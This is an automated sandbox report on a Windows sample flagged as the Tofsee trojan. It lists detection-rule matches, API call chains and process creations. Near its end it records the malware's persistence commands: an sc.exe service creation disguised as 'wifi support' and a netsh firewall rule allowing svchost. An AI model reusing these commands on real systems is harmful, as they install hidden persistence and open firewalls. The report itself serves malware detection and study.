        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,0_2_00401280
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ycgeofkw\Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_0040C9130_2_0040C913
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_0040C91312_2_0040C913
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_030FC91315_2_030FC913
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: String function: 0040EE2A appears 40 times
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: String function: 00402544 appears 53 times
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: String function: 026127AB appears 35 times
        Source: 874A7cigvX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
        Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
        Source: 874A7cigvX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@22/3@9/5
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,0_2_00406A60
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_02679066 CreateToolhelp32Snapshot,Module32First,0_2_02679066
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeCode function: 12_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,12_2_00409A6B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_030F9A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,15_2_030F9A6B
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3680:120:WilError_03
        Source: C:\Users\user\Desktop\874A7cigvX.exeFile created: C:\Users\user\AppData\Local\Temp\xvkslbws.exeJump to behavior
        Source: 874A7cigvX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\874A7cigvX.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 874A7cigvX.exeVirustotal: Detection: 67%
        Source: 874A7cigvX.exeReversingLabs: Detection: 68%
        Source: C:\Users\user\Desktop\874A7cigvX.exeFile read: C:\Users\user\Desktop\874A7cigvX.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\874A7cigvX.exe "C:\Users\user\Desktop\874A7cigvX.exe"
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support"
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection"
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ycgeofkw
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe"
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\Jump to behavior
        Source: C:\Users\user\Desktop\874A7cigvX.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\Jump to behavior
